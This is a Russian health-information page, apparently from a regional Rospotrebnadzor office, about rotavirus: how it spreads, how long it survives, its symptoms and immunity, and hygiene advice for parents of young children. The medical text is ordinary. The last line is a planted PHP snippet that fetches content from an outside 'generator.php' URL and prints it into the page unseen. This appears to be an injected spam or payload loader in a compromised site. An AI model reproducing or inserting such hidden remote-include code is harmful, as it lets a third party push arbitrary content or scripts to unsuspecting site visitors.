Регистрация нового пользоателя


Юные Интеллектуалы
Юные Интеллектуалы
РОТАВИРУСНАЯ ИНФЕКЦИЯ

2014-02-24 13:38:33
РОТАВИРУСНАЯ ИНФЕКЦИЯ

 РОТАВИРУСНАЯ

ИНФЕКЦИЯ

 

 

Острая вирусная антропонозная кишечная инфекция,

возбудителем которой является ротавирус человека из рода Rotavirus.Заболеть ротавирусной инфекцией могут люди в любом возрасте, однако чаще всего болеют дети от 6 месяцев до года – двух.

 

Среди детей и взрослых ротавирусная инфекция может проявляться в виде спорадических случаев, локальных групповых заболеваний, вспышек и имеет повсеместное распространение.

 

Спорадические заболевания регистрируются в течение всего года, однако большинство больных выявляется в зимне-весенний период, в отличие от летне-осеннего, характерного для других кишечных инфекций.

 


По устойчивости ротавирусы приближаются к энтеровирусам:

•      не погибают при хлорировании воды в головных сооружениях водопроводов (водоочистные станции),

•     выживают в водопроводной воде до 60 дней,

•     на овощах, фруктах — 5-30 дней,

•     на тканях из хлопка и шерсти — 12-45 дней,

•     на пластике и крашеных по­верхностях - до 10 дней,

•     в фекалиях — до 7 мес.

 

Механизм передачи возбудителя- фекально-оральный,

реализуемый  пищевым, контактно-бытовым и водным путем.

 

•     Наиболее частым источником заболевания для детей первого года жизни являются инфицированные ротавирусом матери.

•     Перевод ребенка на искусственное вскармливание – значительный риск инфицирования ротавирусами.

 

•     Взрослые и дети старшего возраста инфицируются от больных детей, посещающих детские коллективы.

 

 

Инфекционный процесс

характеризуется явлениями гастроэнтерита и легкими катаральными явлениями верхних дыхательных путей (гиперемия мягкого неба, дужек, язычка).

 

•     Инкубационный период от 15 часов (реально при массивном инфицировании - около 5 часов) до 3-5 суток.

•     Наиболее типичные симптомы:

–     диарея (стул 5 - 10 раз в день) – у 95-97% больных

–     рвота – у 70% - 90%  больных

–     лихорадка– у 60% - 80%  больных.

•     Средняя продолжительность клинического течения 7-8 дней.

•     Может протекать как асимптомно, так и по типу выраженного обезвоженного гастроэнтерита вплоть до летального исхода.

 


Иммунитет

•     Первое инфицирование, как правило, наиболее выраженное.

•     Иммунитет нестойкий, приобретается в результате перенесенного заболевания, повторные заболевания могут регистрироваться через 1 – 1,5 года после перенесенной инфекции.

 

 

Профилактика

•     Мерами профилактики данного заболевания является соблюдение правил личной гигиены (тщательное мытьё рук), питьевой режим (не употреблять сырую водопроводную воду, воду из неизвестных источников), употреблять хорошо промытые ягоды, фрукты, тщательная термическая обработка мясных и прочих блюд. 

Рекомендации:


ЧИСТЫЕ РУКИ, СВЕЖАЯ ЕДА, ВКУСНАЯ ВОДА…

  Постарайтесь сохранить, хотя бы частично, грудное вскармливание малыша первого года на летние месяцы.


• Летом молочные смеси предпочтительно готовить только на 1-2 кормления, а не на целый день (вторая приготовленная порция должна храниться в холодильнике).


• При использовании готовых молочных продуктов, в т. ч. предназначенных специально для малышей, обязательно осматривайте упаковку на предмет срока годности, целостности и вздутости.


• Если вы забыли поставить в холодильник какой-то продукт, не стоит потом доверять своим чувствам, когда вы нюхаете его или пробуете на вкус: некоторые болезнетворные микробы, размножаясь, никак не влияют на органолептические свойства блюда. По крайней мере, не давайте его ребенку.


• Расценивайте воду из-под крана как полуфабрикат — хотя бы в летние месяцы. Без кипячения – ни в коем случае! Лучше всего детям давать кипяченую воду, бутилированную воду, морсы, компоты, кисели и прочее..


• Тщательно мойте овощи, фрукты, ягоды и зелень! Особенно те, которые могли контактировать с землей, например клубнику, салат.


• Не давайте ребенку купленные на рынке молочные продукты, не прошедшие термическую обработку. Творог готовьте  либо своими руками, либо приобретайте в магазине или на молочной кухне.


• Мясные, рыбные, молочные блюда, бульоны, особенно приготовленные для диетического питания, – идеальная среда для размножения микробов. Поэтому для ребенка готовьте блюда не больше, чем на 1 день вперед.


• Если у кого-то в семье неполадки с пищеварительным трактом и возникло подозрение на инфекцию – в идеале этот человек не должен допускаться ни к ребенку, ни к приготовлению еды для него. В любом случае, руки придется мыть всем в семье еще более тщательно, а посуда, и у ребенка, и у заболевшего,  должна быть отдельная.


• При купании в открытых водоемах ни в коем случае не допускайте заглатывания воды. Если едите на пляже, протрите руки, хотя бы специальными влажными салфетками.

 


Личный пример родителей – лучший способ обучения ребенка.

 

 

Ирбитский территориальный отдел

 Управления Роспотребнадзора

по Свердловской области.

 

 

 

 




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>